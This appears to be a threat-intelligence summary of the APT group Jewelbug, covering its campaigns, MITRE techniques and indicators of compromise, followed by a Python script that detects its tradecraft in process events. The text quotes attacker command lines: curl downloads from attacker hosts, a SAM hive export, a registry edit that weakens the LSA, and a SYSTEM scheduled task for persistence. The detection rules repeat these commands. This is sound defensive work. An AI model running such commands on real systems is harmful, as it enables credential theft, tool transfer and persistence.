Chinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has conducted sustained espionage-focused intrusions across South America, South Asia, Taiwan and Russia, targeting IT service providers, government networks and software companies to maintain stealthy persistence and potentially enable supply-chain attacks. The group abuses legitimate cloud services and dual-use tools (notably Yandex Cloud, the Microsoft Graph API/OneDrive, cdb.exe and DLL sideloading) and deploys custom backdoors including Finaldraft, Guidloader and Pathloader, as well as a new OneDrive-based backdoor. #Jewelbug #Finaldraft
Key points
- Jewelbug has been highly active since mid-2023 and conducted recent multi-month intrusions in 2024 and 2025 across South America, South Asia, Taiwan and Russia.
- A Russian IT service provider was breached for five months in 2025, with access to code repositories and build systems that could enable supply-chain attacks against the provider's customers.
- Attackers used legitimate services to remain stealthy, exfiltrating data to Yandex Cloud and naming a malicious sample "yandex2.exe" to blend in with typical Russian usage.
- On a South American government network, Jewelbug deployed a new backdoor, still under development, that uses the Microsoft Graph API and OneDrive for C2, collects file lists and system metadata, and logs its activity to C:\ProgramData\application.ini.
- Activity on a Taiwanese software company included DLL sideloading, ShadowPad deployment, BYOVD (EchoDrv) usage, credential dumping (Mimikatz/LSASS), scheduled tasks and tunneling tools, showing a broad toolkit of custom and public tools.
- Jewelbug consistently uses a renamed cdb.exe (Console Debugger), living-off-the-land binaries, DLL sideloading and cloud-based C2 to minimize detection and maintain long-term persistence.
- Known custom malware families associated with the group include Finaldraft (aka Squidoor), Pathloader and Guidloader, which support in-memory encrypted shellcode execution and Microsoft Graph API-based C2.
MITRE Techniques
- [T1059] Command and Scripting Interpreter: used to run commands and scripts on victim hosts (examples: "curl https://app.blance.workers.dev/png", "reg save HKLM\SAM CSIDL_COMMON_PICTURES\sam.hive").
- [T1204] User Execution: deployment of legitimate binaries and renamed tools (e.g., 7zup.exe as a renamed cdb.exe) to execute payloads and bypass controls. Quote: "appearance of a file named 7zup.exe ... which is a renamed copy of cdb.exe"
- [T1574] Hijack Execution Flow (DLL Sideloading): legitimate executables used for DLL sideloading (e.g., cyglaunch.exe, crclient.dll) to load malicious payloads. Quote: "used a legitimate executable for DLL sideloading"
- [T1218] Signed Binary Proxy Execution (Living off the Land): abuse of the Microsoft-signed CDB (cdb.exe) to run shellcode, launch executables, run DLLs and terminate security solutions. Quote: "CDB can be used to run shellcode and bypass application whitelisting."
- [T1005] Data from Local System: collection of file lists and system metadata (IP, Windows version, hostname, machine identifier) and upload to OneDrive. Quote: "Obtains a list of files from targeted machines and uploads this to OneDrive"
- [T1105] Ingress Tool Transfer: downloading tools and payloads via curl and BITSAdmin (e.g., "bitsadmin /transfer myJob /download ...", "curl -k https://95.164.5.209/png") to bring tools onto victim networks.
- [T1078] Valid Accounts: attempts to add users and use of legitimate remote management tools (AnyDesk) and scheduled tasks for persistence and remote access. Quote: "attempted to add a new user ... used the legitimate AnyDesk remote management software"
- [T1112] Modify Registry: registry edits to alter local policies (e.g., "REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000").
- [T1056] Input Capture / Credential Dumping (LSASS/Mimikatz): use of LSASS dumping and Mimikatz to harvest credentials; command reference: "mimikatz.x64.exe".
- [T1497] Virtualization/Sandbox Evasion: use of VM-related DLLs and tools (vmwarebase.dll, vmware-authd.exe) and redirection of tool output to ADMIN$ shares, indicating attempts to hide or redirect execution artifacts.
- [T1537] Transfer Data to Cloud Account: use of the Microsoft Graph API and OneDrive for C2 and exfiltration, minimizing traditional network indicators. Quote: "leverages Microsoft Graph API and OneDrive as its command and control (C&C) servers."
- [T1210] Exploitation of Remote Services / Web Shells: prior reporting noted exploitation of IIS servers and deployment of webshells to gain initial access and persistence (described in Elastic and Palo Alto findings).
Indicators of Compromise
- [File hashes] malicious and sideloading samples: yandex2.exe (3f49bd1f3b0999096511757e0fbc2e4e2c18176fd1773f71baf2d7a15dbbcfbf), mimikatz.x64.exe (bfe1538445e3f74ef7f41699482b40cf6f3b0a084e188f4c4b786b15eeb3601c).
- [File names] renamed/dual-use binaries: 7zup.exe (renamed cdb.exe), yandex2.exe (used for exfiltration), cyglaunch.exe (used for DLL sideloading), crclient.dll.
- [Domains] C2 and download hosts: app.blance.workers[.]dev (used for downloads/C2), cdn.kindylib[.]info (hosting observed in network indicators).
- [IP addresses] direct download/exfil endpoints: 95.164.5[.]209 (used with curl for the PNG download), 34.117.217.74 (download host referenced in command lines).
- [Command lines] persistence and exfiltration activity, examples: "schtasks /create ... /tn "Microsoft\Windows\ApplicationData\appuriverifierinstalls" /tr "CSIDL_SYSTEM\oobe\setup.exe ui" /sc onstart /RU SYSTEM", "bitsadmin /transfer myJob /download ... https://www.microsoft.com/pt-br/ ...".
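The techniques and command lines above translate directly into host-based detections. The following is an added example (not code from the report or from Symantec) that checks constructed Windows process-creation events for the Jewelbug tradecraft quoted on this page: a renamed cdb.exe, the SAM hive export, the DisableRestrictedAdmin registry change, BITS/curl tool transfer and the SYSTEM scheduled task launched from the oobe directory. The field names (Image, OriginalFileName, CommandLine) follow Sysmon Event ID 1 and are an assumption; all sample events are constructed.

```python
# Added example (not from the report): flag the Jewelbug tradecraft quoted above in
# Windows process-creation events. Field names follow Sysmon Event ID 1 (assumption);
# every sample event below is constructed from the command lines the report quotes.
import re

def _cl(pattern):
    """Build a case-insensitive predicate over an event's CommandLine field."""
    rx = re.compile(pattern, re.I)
    return lambda e: rx.search(e.get("CommandLine", "")) is not None

RULES = {
    # Renamed cdb.exe (e.g. 7zup.exe): PE original filename says CDB, the path does not.
    "renamed_cdb": lambda e: e.get("OriginalFileName", "").lower() == "cdb.exe"
                   and not e.get("Image", "").lower().endswith("\\cdb.exe"),
    "sam_hive_export": _cl(r"\breg(?:\.exe)?\s+save\s+HKLM\\SAM\b"),
    "disable_restricted_admin": _cl(r"Control\\Lsa.*DisableRestrictedAdmin"),
    "bits_download": _cl(r"\bbitsadmin\b.*/transfer\b.*/download\b"),
    "curl_to_raw_ip": _cl(r"\bcurl\b.*https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "system_task_from_oobe": _cl(r"\bschtasks\b.*/create\b.*\\oobe\\.*/RU\s+SYSTEM\b"),
}

def evaluate(event):
    """Return the names of every rule the event matches (empty list = clean)."""
    return [name for name, pred in RULES.items() if pred(event)]

# Constructed sample events; the last one is a benign control.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\7zup.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": r"7zup.exe -cf C:\Users\Public\run.wds"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Users\Public\Pictures\sam.hive"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" '
                    r'/v DisableRestrictedAdmin /t REG_DWORD /d 00000000'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer myJob /download https://www.microsoft.com/pt-br/ C:\Users\Public\x.dat"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl -k https://95.164.5.209/png"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Microsoft\Windows\ApplicationData\appuriverifierinstalls" '
                    r'/tr "C:\Windows\System32\oobe\setup.exe ui" /sc onstart /RU SYSTEM'},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        hits = evaluate(event)
        print("ALERT" if hits else "ok   ", event["Image"], hits)
```

The renamed-cdb rule depends on the PE original filename being logged, which is why process-creation telemetry with that field (rather than filename-only logging) is needed to catch 7zup.exe-style renames; the curl rule deliberately only fires on raw IP destinations, so the app.blance.workers.dev download needs the domain-based indicators above.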
Read more: https://www.security.com/threat-intelligence/jewelbug-apt-russia